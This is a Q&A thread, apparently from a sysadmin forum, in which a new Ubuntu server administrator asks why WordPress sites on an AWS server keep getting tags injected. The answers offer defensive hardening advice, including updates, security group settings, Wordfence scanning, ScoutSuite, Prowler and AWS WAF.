0

Admittedly, I am fairly new to ubuntu server management. I have an AWS server that keeps getting compromised and injecting tags into all the the files for all of the sites on the server. I don't really know what I'm doing wrong or what to do to prevent it. Any help would be much appreciated.

  • Running AWS Ubuntu 18.04 servers
  • Security groups setup to not allow port 80
  • No FTP rules - only SSH (and restricted to my IP)

What am I missing?

fischgeek
  • 111
  • 2
  • 5
  • Read up on server hardening. Patching OS and software regularly, strong passwords, and make sure administration can only be done from known good IP addresses would be a start – Tim Nov 29 '20 at 19:56
  • Thanks @Tim - any sources you would recommend? – fischgeek Nov 29 '20 at 20:12

2 Answers2

2

injecting tags into all the the files for all of the sites on the server

That looks like a website compromise, not necessarily a server compromise (although that's possible too).

My guess is that your website has vulnerabilities and these are exploited by the attackers to insert their own content on the pages. If the website is Wordpress, Drupal, Joomla or something like that make sure that you've got the latest version, that all the plugins are updated, that you only have the necessary plugins installed, etc.

Google something like "securing a wordpress website" (or drupal website, etc) - there'll be plenty of pages to learn from.

Hope that helps :)

MLu
  • 24,849
  • 5
  • 59
  • 86
  • Thank you. I appreciate the input. They are Wordpress sites and are all on the latest and have very minimal plugins. I also turned on automatic updates on everything. So, that's why I thought maybe the server itself was getting compromised because it's happening to all the sites. Seems likely, doesn't it? – fischgeek Nov 29 '20 at 20:16
  • @fischgeek Ubuntu 18.04 is fairly secure out of the box, there's not much that can be attacked. Only permit access on website ports 80 and 443 from the internet and for the management only open port 22 from your IP (check with [ifconfig.co](https://ifconfig.co) ) in the Security Group - then it should be reasonably secure and the only attack vector will be the Wordpress. Makes sense? – MLu Nov 29 '20 at 20:22
0

Having had some of this fun in a previous life with Wordpress sites.

I found https://www.wordfence.com/ super useful in finding all the files in the sites that had been compromised. Once you are compromised you can find the attackers have left several ways going forward for you to be compromised again. I would run this, they will verify your installations and files are not compromised still.

To verify you got your security in line in AWS run these excellent tools linked below, they can be a little overwhelming at first but worth the investment if you going to run long term in AWS.

Scout suite https://github.com/nccgroup/ScoutSuite

Prowler https://github.com/toniblyx/prowler

If you are new to managing word press sites in AWS then you cannot go far wrong with something like Bitnami Wordpress images https://bitnami.com/stack/wordpress/virtual-machine. These are out of the box setups and reasonable good setup and practices for hosting from the get go. They do come with some draw backs we found with major upgrades but plenty of documentations on managing that.

Check your logs also is good way to potentially spot what is compromising you and give you some google paths to go down.

If you want to carry on adding layers take a look at WAF in AWS. (https://aws.amazon.com/waf/) That will give you some extra protection if you are still getting problems.

hths, I feel your pain.

JamesKn
  • 101
  • 2